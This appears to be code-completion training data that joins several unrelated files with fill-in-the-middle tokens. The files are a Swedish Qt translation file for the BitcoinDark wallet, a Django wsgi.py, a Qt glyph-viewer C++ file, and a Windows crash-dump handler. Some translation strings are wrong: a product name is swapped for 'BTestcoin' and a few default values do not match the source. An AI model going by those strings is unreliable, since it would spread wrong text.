<message>
<location line="+2"/>
<source>To yourself</source>
<translation>Till dig själv</translation>
</message>
<message>
<location line="+1"/>
<source>Mined</source>
<translation>Genererade</translation>
</message>
<message>
<location line="+1"/>
<source>Other</source>
<translation>Övriga</translation>
</message>
<message>
<location line="+7"/>
<source>Enter address or label to search</source>
<translation>Sök efter adress eller etikett </translation>
</message>
<message>
<location line="+7"/>
<source>Min amount</source>
<translation>Minsta mängd</translation>
</message>
<message>
<location line="+34"/>
<source>Copy address</source>
<translation>Kopiera adress</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>Kopiera etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="+1"/>
<source>Copy transaction ID</source>
<translation>Kopiera transaktions ID</translation>
</message>
<message>
<location line="+1"/>
<source>Edit label</source>
<translation>Ändra etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Show transaction details</source>
<translation>Visa transaktionsdetaljer</translation>
</message>
<message>
<location line="+144"/>
<source>Export Transaction Data</source>
<translation>Exportera transaktionsdata</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>Kommaseparerad fil (*. csv)</translation>
</message>
<message>
<location line="+8"/>
<source>Confirmed</source>
<translation>Bekräftad</translation>
</message>
<message>
<location line="+1"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+1"/>
<source>Type</source>
<translation>Typ</translation>
</message>
<message>
<location line="+1"/>
<source>Label</source>
<translation>Etikett</translation>
</message>
<message>
<location line="+1"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+1"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+1"/>
<source>ID</source>
<translation>ID</translation>
</message>
<message>
<location line="+4"/>
<source>Error exporting</source>
<translation>Fel vid exportering</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>Kan inte skriva till fil %1.</translation>
</message>
<message>
<location line="+100"/>
<source>Range:</source>
<translation>Intervall:</translation>
</message>
<message>
<location line="+8"/>
<source>to</source>
<translation>till</translation>
</message>
</context>
<context>
<name>WalletModel</name>
<message>
<location filename="../walletmodel.cpp" line="+206"/>
<source>Sending...</source>
<translation>Skickar...</translation>
</message>
</context>
<context>
<name>bitcoin-core</name>
<message>
<location filename="../bitcoinstrings.cpp" line="+33"/>
<source>BitcoinDark version</source>
<translation>BitcoinDark version</translation>
</message>
<message>
<location line="+1"/>
<source>Usage:</source>
<translation>Användning:</translation>
</message>
<message>
<location line="+1"/>
<source>Send command to -server or BitcoinDarkd</source>
<translation>Skicka kommando till -server eller BitcoinDarkd</translation>
</message>
<message>
<location line="+1"/>
<source>List commands</source>
<translation>Lista kommandon</translation>
</message>
<message>
<location line="+1"/>
<source>Get help for a command</source>
<translation>Få hjälp med ett kommando</translation>
</message>
<message>
<location line="+2"/>
<source>Options:</source>
<translation>Inställningar:</translation>
</message>
<message>
<location line="+2"/>
<source>Specify configuration file (default: BitcoinDark.conf)</source>
<translation>Ange konfigurationsfilen (standard: BitcoinDark.conf)</translation>
</message>
<message>
<location line="+1"/>
<source>Specify pid file (default: BitcoinDarkd.pid)</source>
<translation>Ange pid filen (standard BitcoinDarkd.pid)</translation>
</message>
<message>
<location line="+2"/>
<source>Specify wallet file (within data directory)</source>
<translation>Ange plånboksfil (inom datakatalogen)</translation>
</message>
<message>
<location line="-1"/>
<source>Specify data directory</source>
<translation>Ange katalog för data</translation>
</message>
<message>
<location line="+2"/>
<source>Set database cache size in megabytes (default: 25)</source>
<translation>Sätt databas cache storleken i megabyte (förvalt: 25)</translation>
</message>
<message>
<location line="+1"/>
<source>Set database disk log size in megabytes (default: 100)</source>
<translation>Sätt databas logg storleken i MB (standard: 100)</translation>
</message>
<message>
<location line="+6"/>
<source>Listen for connections on <port> (default: 15714 or testnet: 25714)</source>
<translation>Lyssna efter anslutningar på <port> (standard: 15714 eller testnät: 25714)</translation>
</message>
<message>
<location line="+1"/>
<source>Maintain at most <n> connections to peers (default: 125)</source>
<translation>Ha som mest <n> anslutningar till andra klienter (förvalt: 125)</translation>
</message>
<message>
<location line="+3"/>
<source>Connect to a node to retrieve peer addresses, and disconnect</source>
<translation>Anslut till en nod för att hämta klientadresser, och koppla från</translation>
</message>
<message>
<location line="+1"/>
<source>Specify your own public address</source>
<translation>Ange din egen publika adress</translation>
</message>
<message>
<location line="+5"/>
<source>Bind to given address. Use [host]:port notation for IPv6</source>
<translation>Bind till angiven adress. Använd [host]:port för IPv6</translation>
</message>
<message>
<location line="+2"/>
<source>Stake your coins to support network and gain reward (default: 1)</source>
<translation>Använd dina coins för stake-processen, du upprätthåller då nätverket och får belöning (förval: 1)</translation>
</message>
<message>
<location line="+5"/>
<source>Threshold for disconnecting misbehaving peers (default: 100)</source>
<translation>Tröskelvärde för att koppla ifrån klienter som missköter sig (förvalt: 100)</translation>
</message>
<message>
<location line="+1"/>
<source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source>
<translation>Antal sekunder att hindra klienter som missköter sig från att ansluta (förvalt: 86400)</translation>
</message>
<message>
<location line="-44"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source>
<translation>Ett fel uppstod vid upprättandet av RPC port %u för att lyssna på IPv4: %s</translation>
</message>
<message>
<location line="+51"/>
<source>Detach block and address databases. Increases shutdown time (default: 0)</source>
<translation>Koppla ifrån block och adress databaser. Ökar nedstängningstid (standard: 0)</translation>
</message>
<message>
<location line="+109"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>Fel: Transaktionen nekades. Detta kan hända om vissa av mynten i din plånbok redan är använda, t.ex om du använder en kopia av wallet.dat och mynten redan var använda i kopia men inte markerade som använda här.</translation>
</message>
<message>
<location line="-5"/>
<source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds </source>
<translation>Fel: Transaktionen kräver en transaktionsavgift på min %s på grund av dess storlek, komplexitet eller användning av nyligen mottagna kapital</translation>
</message>
<message>
<location line="-87"/>
<source>Listen for JSON-RPC connections on <port> (default: 15715 or testnet: 25715)</source>
<translation>Lyssna efter JSON-RPC anslutningar på <port> (standard: 15715 eller testnät: 25715)</translation>
</message>
<message>
<location line="-11"/>
<source>Accept command line and JSON-RPC commands</source>
<translation>Tillåt kommandon från kommandotolken och JSON-RPC-kommandon</translation>
</message>
<message>
<location line="+101"/>
<source>Error: Transaction creation failed </source>
<translation>Fel: Skapandet av transaktion misslyckades</translation>
</message>
<message>
<location line="-5"/>
<source>Error: Wallet locked, unable to create transaction </source>
<translation>Fel: Plånboken låst, kan inte utföra transaktion</translation>
</message>
<message>
<location line="-8"/>
<source>Importing blockchain data file.</source>
<translation>Importerar blockchain data fil.</translation>
</message>
<message>
<location line="+1"/>
<source>Importing bootstrap blockchain data file.</source>
<translation>Importerar bootstrap blockchain data fil.</translation>
</message>
<message>
<location line="-88"/>
<source>Run in the background as a daemon and accept commands</source>
<translation>Kör i bakgrunden som tjänst och acceptera kommandon</translation>
</message>
<message>
<location line="+1"/>
<source>Use the test network</source>
<translation>Använd testnätverket</translation>
</message>
<message>
<location line="-24"/>
<source>Accept connections from outside (default: 1 if no -proxy or -connect)</source>
<translation>Acceptera anslutningar utifrån (förvalt: 1 om ingen -proxy eller -connect)</translation>
</message>
<message>
<location line="-38"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source>
<translation>Ett fel uppstod vid upprättandet av RPC port %u för att lyssna på IPv6, faller tillbaka till IPV4: %s</translation>
</message>
<message>
<location line="+117"/>
<source>Error initializing database environment %s! To recover, BACKUP THAT DIRECTORY, then remove everything from it except for wallet.dat.</source>
<translation>Ett fel uppstod vid initialiseringen av databasen %s! För att återställa, SÄKERHETSKOPIERA MAPPEN, radera sedan allt från mappen förutom wallet.dat.</translation>
</message>
<message>
<location line="-20"/>
<source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source>
<translation>Ställ in max storlek för hög prioritet/lågavgifts transaktioner i bytes (förval: 27000)</translation>
</message>
<message>
<location line="+11"/>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>Varning: -paytxfee är satt väldigt hög! Detta är avgiften du kommer betala för varje transaktion.</translation>
</message>
<message>
<location line="+61"/>
<source>Warning: Please check that your computer's date and time are correct! If your clock is wrong BitcoinDark will not work properly.</source>
<translation>Varning: Kolla att din dators tid och datum är rätt. BTestcoin kan inte fungera ordentligt om tiden i datorn är fel.</translation>
</message>
<message>
<location line="-31"/>
<source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source>
<translation>Varning: fel vid läsning av wallet.dat! Alla nycklar lästes korrekt, men transaktionsdatan eller adressbokens poster kanske saknas eller är felaktiga.</translation>
</message>
<message>
<location line="-18"/>
<source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source>
<translation>Varning: wallet.dat korrupt, datan har räddats! Den ursprungliga wallet.dat har sparas som wallet.{timestamp}.bak i %s; om ditt saldo eller transaktioner är felaktiga ska du återställa från en säkerhetskopia.</translation>
</message>
<message>
<location line="-30"/>
<source>Attempt to recover private keys from a corrupt wallet.dat</source>
<translation>Försök att rädda de privata nycklarna från en korrupt wallet.dat</translation>
</message>
<message>
<location line="+4"/>
<source>Block creation options:</source>
<translation>Block skapande inställningar:</translation>
</message>
<message>
<location line="-62"/>
<source>Connect only to the specified node(s)</source>
<translation>Koppla enbart upp till den/de specificerade noden/noder</translation>
</message>
<message>
<location line="+4"/>
<source>Discover own IP address (default: 1 when listening and no -externalip)</source>
<translation>Hitta egen IP-adress (förvalt: 1 under lyssning och utan -externalip)</translation>
</message>
<message>
<location line="+94"/>
<source>Failed to listen on any port. Use -listen=0 if you want this.</source>
<translation>Misslyckades att lyssna på någon port. Använd -listen=0 om du vill detta.</translation>
</message>
<message>
<location line="-90"/>
<source>Find peers using DNS lookup (default: 1)</source>
<translation>Hitta andra klienter via DNS uppsökning (standard: 1)</translation>
</message>
<message>
<location line="+5"/>
<source>Sync checkpoints policy (default: strict)</source>
<translation>Synka kontrollpunkts policy (standard: strict)</translation>
</message>
<message>
<location line="+83"/>
<source>Invalid -tor address: '%s'</source>
<translation>Fel -tor adress: '%s'</translation>
</message>
<message>
<location line="+4"/>
<source>Invalid amount for -reservebalance=<amount></source>
<translation>Fel mängd för -reservebalance=<amount></translation>
</message>
<message>
<location line="-82"/>
<source>Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000)</source>
<translation>Maximal buffert för mottagning per anslutning, <n>*1000 byte (förvalt: 5000)</translation>
</message>
<message>
<location line="+1"/>
<source>Maximum per-connection send buffer, <n>*1000 bytes (default: 1000)</source>
<translation>Maximal buffert för sändning per anslutning, <n>*1000 byte (förvalt: 5000)</translation>
</message>
<message>
<location line="-16"/>
<source>Only connect to nodes in network <net> (IPv4, IPv6 or Tor)</source>
<translation>Anslut enbart till noder i nätverket <net> (IPv4, IPv6 eller Tor)</translation>
</message>
<message>
<location line="+28"/>
<source>Output extra debugging information. Implies all other -debug* options</source>
<translation>Skriv ut extra debug information. Betyder alla andra -debug* alternativ </translation>
</message>
<message>
<location line="+1"/>
<source>Output extra network debugging information</source>
<translation>Skriv ut extra nätverks debug information</translation>
</message>
<message>
<location line="+1"/>
<source>Prepend debug output with timestamp</source>
<translation>Tidstämpla debug utskriften</translation>
</message>
<message>
<location line="+35"/>
<source>SSL options: (see the Bitcoin Wiki for SSL setup instructions)</source>
<translation>SSL-inställningar: (se Bitcoin-wikin för SSL-setup instruktioner)</translation>
</message>
<message>
<location line="-74"/>
<source>Select the version of socks proxy to use (4-5, default: 5)</source>
<translation>Välj version av socks proxy (4-5, förval 5)</translation>
</message>
<message>
<location line="+41"/>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>Skicka trace-/debuginformation till terminalen istället för till debug.log</translation>
</message>
<message>
<location line="+1"/>
<source>Send trace/debug info to debugger</source>
<translation>Skicka trace/debug till debuggern</translation>
</message>
<message>
<location line="+28"/><|fim▁hole|> <source>Set maximum block size in bytes (default: 250000)</source>
<translation>Sätt största blockstorlek i bytes (förvalt: 250000)</translation>
</message>
<message>
<location line="-1"/>
<source>Set minimum block size in bytes (default: 0)</source>
<translation>Sätt minsta blockstorlek i byte (förvalt: 0)</translation>
</message>
<message>
<location line="-29"/>
<source>Shrink debug.log file on client startup (default: 1 when no -debug)</source>
<translation>Krymp debug.log filen vid klient start (förvalt: 1 vid ingen -debug)</translation>
</message>
<message>
<location line="-42"/>
<source>Specify connection timeout in milliseconds (default: 5000)</source>
<translation>Ange timeout för uppkoppling i millisekunder (förvalt: 5000)</translation>
</message>
<message>
<location line="+109"/>
<source>Unable to sign checkpoint, wrong checkpointkey?
</source>
<translation>Kan inte signera checkpoint, fel checkpointkey?
</translation>
</message>
<message>
<location line="-80"/>
<source>Use UPnP to map the listening port (default: 0)</source>
<translation>Använd UPnP för att mappa den lyssnande porten (förvalt: 0)</translation>
</message>
<message>
<location line="-1"/>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>Använd UPnP för att mappa den lyssnande porten (förvalt: 1 under lyssning)</translation>
</message>
<message>
<location line="-25"/>
<source>Use proxy to reach tor hidden services (default: same as -proxy)</source>
<translation>Använd proxy för att nå Tor gömda servicer (standard: samma som -proxy)</translation>
</message>
<message>
<location line="+42"/>
<source>Username for JSON-RPC connections</source>
<translation>Användarnamn för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="+47"/>
<source>Verifying database integrity...</source>
<translation>Verifierar integriteten i databasen...</translation>
</message>
<message>
<location line="+57"/>
<source>WARNING: syncronized checkpoint violation detected, but skipped!</source>
<translation>VARNING: synkroniserad kontrollpunkts brott upptäckt, men hoppades över!</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: Disk space is low!</source>
<translation>Varning: Lågt skivutrymme</translation>
</message>
<message>
<location line="-2"/>
<source>Warning: This version is obsolete, upgrade required!</source>
<translation>Varning: denna version är föråldrad, uppgradering krävs!</translation>
</message>
<message>
<location line="-48"/>
<source>wallet.dat corrupt, salvage failed</source>
<translation>wallet.dat korrupt, räddning misslyckades</translation>
</message>
<message>
<location line="-54"/>
<source>Password for JSON-RPC connections</source>
<translation>Lösenord för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="-84"/>
<source>%s, you must set a rpcpassword in the configuration file:
%s
It is recommended you use the following random password:
rpcuser=BitcoinDarkrpc
rpcpassword=%s
(you do not need to remember this password)
The username and password MUST NOT be the same.
If the file does not exist, create it with owner-readable-only file permissions.
It is also recommended to set alertnotify so you are notified of problems;
for example: alertnotify=echo %%s | mail -s "BitcoinDark Alert" [email protected]
</source>
<translation>%s, du måste sätta rpcpassword i konfigurationsfilen:
%s
Det är rekommenderat att du använder följande slumpmässiga lösenord:
rpcuser=BitcoinDarkrpc
rpcpassword=%s
(du behöver inte komma ihåg detta lösenord)
Användarnamnet och lösenordet FÅR INTE vara samma.
Om filen inte finns, skapa den med endast ägarrättigheter.
Det är också rekommenderat att sätta alertnotify så du blir notifierad om problem;
till exempel: alertnotify=echo %%s | mail -s "BitcoinDark Varning" [email protected]
</translation>
</message>
<message>
<location line="+51"/>
<source>Find peers using internet relay chat (default: 0)</source>
<translation>Hitta andra klienter genom internet relay chat (standard: 1) {0)?}</translation>
</message>
<message>
<location line="+5"/>
<source>Sync time with other nodes. Disable if time on your system is precise e.g. syncing with NTP (default: 1)</source>
<translation>Synkronisera tiden med andra noder. Avaktivera om klockan i ditt sytem är exakt som t.ex. synkroniserad med NTP (förval: 1)</translation>
</message>
<message>
<location line="+15"/>
<source>When creating transactions, ignore inputs with value less than this (default: 0.01)</source>
<translation>När transaktioner skapas, ignorera värden som är lägre än detta (standard: 0.01)</translation>
</message>
<message>
<location line="+16"/>
<source>Allow JSON-RPC connections from specified IP address</source>
<translation>Tillåt JSON-RPC-anslutningar från specifika IP-adresser</translation>
</message>
<message>
<location line="+1"/>
<source>Send commands to node running on <ip> (default: 127.0.0.1)</source>
<translation>Skicka kommandon till klient på <ip> (förvalt: 127.0.0.1)</translation>
</message>
<message>
<location line="+1"/>
<source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source>
<translation>Exekvera kommando när det bästa blocket ändras (%s i cmd är utbytt av blockhash)</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source>
<translation>Exekvera kommando när en plånbokstransaktion ändras (%s i cmd är ersatt av TxID)</translation>
</message>
<message>
<location line="+3"/>
<source>Require a confirmations for change (default: 0)</source>
<translation>Kräv bekräftelse för ändring (förval: 0)</translation>
</message>
<message>
<location line="+1"/>
<source>Enforce transaction scripts to use canonical PUSH operators (default: 1)</source>
<translation>Tvinga transaktionsskript att använda kanoniska PUSH operatörer (standard: 1)</translation>
</message>
<message>
<location line="+2"/>
<source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source>
<translation>Kör kommando när en relevant alert är mottagen (%s i cmd är ersatt av meddelandet)</translation>
</message>
<message>
<location line="+3"/>
<source>Upgrade wallet to latest format</source>
<translation>Uppgradera plånboken till senaste formatet</translation>
</message>
<message>
<location line="+1"/>
<source>Set key pool size to <n> (default: 100)</source>
<translation>Sätt storleken på nyckelpoolen till <n> (förvalt: 100)</translation>
</message>
<message>
<location line="+1"/>
<source>Rescan the block chain for missing wallet transactions</source>
<translation>Sök i blockkedjan efter saknade plånboks transaktioner</translation>
</message>
<message>
<location line="+2"/>
<source>How many blocks to check at startup (default: 2500, 0 = all)</source>
<translation>Antal block som kollas vid start (standard: 2500, 0=alla)</translation>
</message>
<message>
<location line="+1"/>
<source>How thorough the block verification is (0-6, default: 1)</source>
<translation>Hur genomförlig blockverifikationen är (0-6, standard: 1)</translation>
</message>
<message>
<location line="+1"/>
<source>Imports blocks from external blk000?.dat file</source>
<translation>Importera block från en extern blk000?.dat fil</translation>
</message>
<message>
<location line="+8"/>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>Använd OpenSSL (https) för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="+1"/>
<source>Server certificate file (default: server.cert)</source>
<translation>Serverns certifikatfil (förvalt: server.cert)</translation>
</message>
<message>
<location line="+1"/>
<source>Server private key (default: server.pem)</source>
<translation>Serverns privata nyckel (förvalt: server.pem)</translation>
</message>
<message>
<location line="+1"/>
<source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source>
<translation>Godtagbara chiffer (standard: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation>
</message>
<message>
<location line="+53"/>
<source>Error: Wallet unlocked for staking only, unable to create transaction.</source>
<translation>Fel: Plånboken öppnad endast för stake-process, kan inte skapa transaktion.</translation>
</message>
<message>
<location line="+18"/>
<source>WARNING: Invalid checkpoint found! Displayed transactions may not be correct! You may need to upgrade, or notify developers.</source>
<translation>VARNING: Felaktig kontrollpunkt hittad! Visade transaktioner kan vara felaktiga! Du kan behöva uppgradera eller kontakta utvecklarna.</translation>
</message>
<message>
<location line="-158"/>
<source>This help message</source>
<translation>Det här hjälp medelandet</translation>
</message>
<message>
<location line="+95"/>
<source>Wallet %s resides outside data directory %s.</source>
<translation>Plånbok %s ligger utanför datamappen %s.</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot obtain a lock on data directory %s. BitcoinDark is probably already running.</source>
<translation>Kan inte låsa datan i mappen %s. BTestcoin är kanske redan startad.</translation>
</message>
<message>
<location line="-98"/>
<source>BitcoinDark</source>
<translation>BitcoinDark</translation>
</message>
<message>
<location line="+140"/>
<source>Unable to bind to %s on this computer (bind returned error %d, %s)</source>
<translation>Det går inte att binda till %s på den här datorn (bind returnerade felmeddelande %d, %s)</translation>
</message>
<message>
<location line="-130"/>
<source>Connect through socks proxy</source>
<translation>Koppla genom en socks proxy</translation>
</message>
<message>
<location line="+3"/>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>Tillåt DNS-sökningar för -addnode, -seednode och -connect</translation>
</message>
<message>
<location line="+122"/>
<source>Loading addresses...</source>
<translation>Laddar adresser...</translation>
</message>
<message>
<location line="-15"/>
<source>Error loading blkindex.dat</source>
<translation>Fel vid laddande av blkindex.dat</translation>
</message>
<message>
<location line="+2"/>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>Fel vid inläsningen av wallet.dat: Plånboken är skadad</translation>
</message>
<message>
<location line="+4"/>
<source>Error loading wallet.dat: Wallet requires newer version of BitcoinDark</source>
<translation>Kunde inte ladda wallet.dat: En nyare version av BTestcoin krävs</translation>
</message>
<message>
<location line="+1"/>
<source>Wallet needed to be rewritten: restart BitcoinDark to complete</source>
<translation>Plånboken måste skrivas om: Starta om BTestcoin för att slutföra</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading wallet.dat</source>
<translation>Fel vid inläsning av plånboksfilen wallet.dat</translation>
</message>
<message>
<location line="-16"/>
<source>Invalid -proxy address: '%s'</source>
<translation>Ogiltig -proxy adress: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown network specified in -onlynet: '%s'</source>
<translation>Okänt nätverk som anges i -onlynet: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown -socks proxy version requested: %i</source>
<translation>Okänd -socks proxy version begärd: %i</translation>
</message>
<message>
<location line="+4"/>
<source>Cannot resolve -bind address: '%s'</source>
<translation>Kan inte matcha -bind adress: '%s'</translation>
</message>
<message>
<location line="+2"/>
<source>Cannot resolve -externalip address: '%s'</source>
<translation>Kan inte matcha -externalip adress: '%s'</translation>
</message>
<message>
<location line="-24"/>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>Ogiltigt belopp för -paytxfee=<belopp>:'%s'</translation>
</message>
<message>
<location line="+44"/>
<source>Error: could not start node</source>
<translation>Fel: kunde inte starta noden</translation>
</message>
<message>
<location line="+11"/>
<source>Sending...</source>
<translation>Skickar...</translation>
</message>
<message>
<location line="+5"/>
<source>Invalid amount</source>
<translation>Ogiltig mängd</translation>
</message>
<message>
<location line="+1"/>
<source>Insufficient funds</source>
<translation>Otillräckligt med bitcoins</translation>
</message>
<message>
<location line="-34"/>
<source>Loading block index...</source>
<translation>Laddar blockindex...</translation>
</message>
<message>
<location line="-103"/>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>Lägg till en nod att koppla upp mot och försök att hålla anslutningen öppen</translation>
</message>
<message>
<location line="+122"/>
<source>Unable to bind to %s on this computer. BitcoinDark is probably already running.</source>
<translation>Kan inte binda till %s på denna dator. BTestcoin är sannolikt redan startad.</translation>
</message>
<message>
<location line="-97"/>
<source>Fee per KB to add to transactions you send</source>
<translation>Avgift per KB som adderas till transaktionen du sänder</translation>
</message>
<message>
<location line="+55"/>
<source>Invalid amount for -mininput=<amount>: '%s'</source>
<translation>Fel mängd för -mininput=<amount>: '%s'</translation>
</message>
<message>
<location line="+25"/>
<source>Loading wallet...</source>
<translation>Laddar plånbok...</translation>
</message>
<message>
<location line="+8"/>
<source>Cannot downgrade wallet</source>
<translation>Kan inte nedgradera plånboken</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot initialize keypool</source>
<translation>Kan inte initialisera keypool</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot write default address</source>
<translation>Kan inte skriva standardadress</translation>
</message>
<message>
<location line="+1"/>
<source>Rescanning...</source>
<translation>Söker igen...</translation>
</message>
<message>
<location line="+5"/>
<source>Done loading</source>
<translation>Klar med laddning</translation>
</message>
<message>
<location line="-167"/>
<source>To use the %s option</source>
<translation>Att använda %s alternativet</translation>
</message>
<message>
<location line="+14"/>
<source>Error</source>
<translation>Fel</translation>
</message>
<message>
<location line="+6"/>
<source>You must set rpcpassword=<password> in the configuration file:
%s
If the file does not exist, create it with owner-readable-only file permissions.</source>
<translation>Du behöver välja ett rpclösensord i konfigurationsfilen:
%s
Om filen inte existerar, skapa den med filrättigheten endast läsbar för ägaren.</translation>
</message>
</context>
</TS><|fim▁end|> | |
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_tutorial.settings")
application = get_wsgi_application()<|fim▁end|> | """
WSGI config for django_tutorial project. |
<|file_name|>glyphviewerdialogextension.cpp<|end_file_name|><|fim▁begin|>/*
(c) Copyright 2002, 2003 Rogier van Dalen
([email protected] for any comments, questions or bugs)
This file is part of my OpenType/TrueType Font Tools.
The OpenType/TrueType Font Tools is free software; you can redistribute
it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
The OpenType/TrueType Font Tools is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License
along with the OpenType/TrueType Font Tools; if not, write to the Free
Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
In addition, as a special exception, Rogier van Dalen gives permission
to link the code of this program with Qt non-commercial edition (or with
modified versions of Qt non-commercial edition that use the same license
as Qt non-commercial edition), and distribute linked combinations
including the two. You must obey the GNU General Public License in all
respects for all of the code used other than Qt non-commercial edition.
If you modify this file, you may extend this exception to your version of
the file, but you are not obligated to do so. If you do not wish to do
so, delete this exception statement from your version.
*/
#include <qpushbutton.h>
#include "glyphviewerdialogextension.h"
GlyphViewerDialogExtension::GlyphViewerDialogExtension (QWidget* parent)<|fim▁hole|> connect( buttonBackInstruction, SIGNAL( clicked() ), parent, SLOT( backInstruction() ) );
connect( buttonPreviousInstruction, SIGNAL( clicked() ), parent, SLOT( previousInstruction() ) );
connect( buttonNextInstruction, SIGNAL( clicked() ), parent, SLOT( nextInstruction() ) );
connect( buttonForwardInstruction, SIGNAL( clicked() ), parent, SLOT( forwardInstruction() ) );
connect( buttonLastInstruction, SIGNAL( clicked() ), parent, SLOT( lastInstruction() ) );
connect( buttonStackViewer, SIGNAL( clicked() ), parent, SLOT( openStackViewer() ) );
connect( buttonStorageViewer, SIGNAL( clicked() ), parent, SLOT( openStorageViewer() ) );
connect( buttonCVTViewer, SIGNAL( clicked() ), parent, SLOT( openCVTViewer() ) );
connect( buttonGraphicsStateViewer, SIGNAL( clicked() ), parent, SLOT( openGraphicsStateViewer() ) );
}
GlyphViewerDialogExtension::~GlyphViewerDialogExtension() {}<|fim▁end|> | : GlyphViewerDialogExtensionBase (parent)
{
connect( buttonFirstInstruction, SIGNAL( clicked() ), parent, SLOT( firstInstruction() ) ); |
<|file_name|>HandleException.cpp<|end_file_name|><|fim▁begin|>#include "stdafx.h"
#include "HandleException.h"
#include <dbghelp.h>
#pragma comment ( lib, "dbghelp.lib" )
typedef LONG (WINAPI * UNHANDLEDEXCEPTIONFILTER)
(
struct _EXCEPTION_POINTERS *ExceptionInfo
);
static HANDLE gEventExit = NULL;
static LONG lExceptCode = EXCEPTION_EXECUTE_HANDLER;
static CHAR szDumpFile[MAX_PATH]={0};
static BOOL bMakeDumpFile = TRUE;
//static LPTOP_LEVEL_EXCEPTION_FILTER defaultExceptionCallBack = NULL;
static UNHANDLEDEXCEPTIONFILTER Real_UnhandledExceptionFilter = NULL;
static PFN_HandleException fnSEHException = NULL;
static LONG WINAPI DeBug_CreateDump(EXCEPTION_POINTERS* pExceptionPointers)
{
BOOL bMiniDumpSuccessful;
//TCHAR szFileName[MAX_PATH];
if (bMakeDumpFile)
{
HANDLE hDumpFile;
MINIDUMP_EXCEPTION_INFORMATION ExpParam;
SYSTEMTIME sys_time;
GetLocalTime(&sys_time);
wsprintfA( szDumpFile,"%04d%02d%02d%02d%02d%02d%03d.dmp",
sys_time.wYear,sys_time.wMonth,sys_time.wDay,sys_time.wHour,
sys_time.wMinute,sys_time.wSecond,sys_time.wMilliseconds);
hDumpFile = CreateFileA(szDumpFile, GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_WRITE|FILE_SHARE_READ, 0, CREATE_ALWAYS, 0, 0);
if (hDumpFile != INVALID_HANDLE_VALUE)
{
ExpParam.ThreadId = GetCurrentThreadId();
ExpParam.ExceptionPointers = pExceptionPointers;
ExpParam.ClientPointers = TRUE;
bMiniDumpSuccessful = MiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(),
hDumpFile, MiniDumpNormal,
&ExpParam, NULL, NULL);
CloseHandle(hDumpFile);
}
}
if(gEventExit) SetEvent(gEventExit);
return lExceptCode;
}
<|fim▁hole|>static LONG WINAPI DeBug_UnHandleCreateDump(EXCEPTION_POINTERS* pExceptionPointers)
{
DeBug_CreateDump(pExceptionPointers);
if (fnSEHException)
{
fnSEHException(szDumpFile);
}
if(gEventExit)
{
WaitForSingleObject(gEventExit,3000);
}
if(EXCEPTION_EXECUTE_HANDLER == lExceptCode) ExitProcess(0);
return lExceptCode;
}
static BOOL StartHookDebug()
{
//Kernel32
HMODULE hModule = LoadLibrary(_T("Kernel32.dll"));
if (hModule == NULL)
{
return FALSE;
}
Real_UnhandledExceptionFilter = (UNHANDLEDEXCEPTIONFILTER)GetProcAddress(hModule,"UnhandledExceptionFilter");
if (Real_UnhandledExceptionFilter == NULL)
{
return FALSE;
}
